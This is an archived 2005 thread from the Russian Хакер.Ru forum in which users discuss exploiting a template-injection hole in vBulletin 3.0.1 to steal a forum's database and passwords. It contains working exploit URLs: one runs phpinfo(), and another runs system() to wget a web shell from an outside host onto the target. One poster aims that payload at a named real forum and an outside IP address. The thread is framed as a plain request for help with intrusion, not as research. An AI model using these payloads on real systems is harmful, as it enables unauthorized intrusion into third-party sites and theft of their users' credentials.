Форумы на Хакер

Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.

HELP

Пользователи, просматривающие топик: none

Зашли как: Guest

Все форумы >> [В Сети] >> HELP

Имя

Сообщение

<< Старые топики Новые топики >>

HELP - 2005-09-18 13:21:08

maxxxx

Сообщений: 2
Оценки: 0
Присоединился: 2005-09-18 13:10:55

Нашел глючный vBulletin Version 3.0.1 и ввоже в нем:
http://Что-то там/misc.php?do=page&template={${phpinfo()}}
И он мне выдает всё [sm=1.gif]
Можно ли как-нить с помощью этой дыры спионерить базу, пароли?
Если да то каким командами? А то у меня нефига не выходит.

Post #: 1

HELP - 2005-09-18 14:13:52

jEnizix

Сообщений: 1797
Оценки: 0
Присоединился: 2004-12-30 11:03:50

Ну тк заливай шелл нормальный и все! например от ccteam, там есть ф-ии дампа БД…
Примерно вот так: misc.php?do=page&template={${system($_GET[cmd])}}&cmd=wget -O shell.php http://путь_до_шелла_который_нада_скачать

Ну а потом уже с ним работай…

Post #: 2

HELP - 2005-09-18 20:46:08

maxxxx

Сообщений: 2
Оценки: 0
Присоединился: 2005-09-18 13:10:55

http://forum.gatchina.ru/misc.php?do=page&template={${system($_GET[cmd])}}&cmd=wget -O shell.php http://212.58.211.248

Че то он всеравно нефига не кочает =((

Post #: 3

Страниц: [1]

Все форумы >> [В Сети] >> HELP

Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.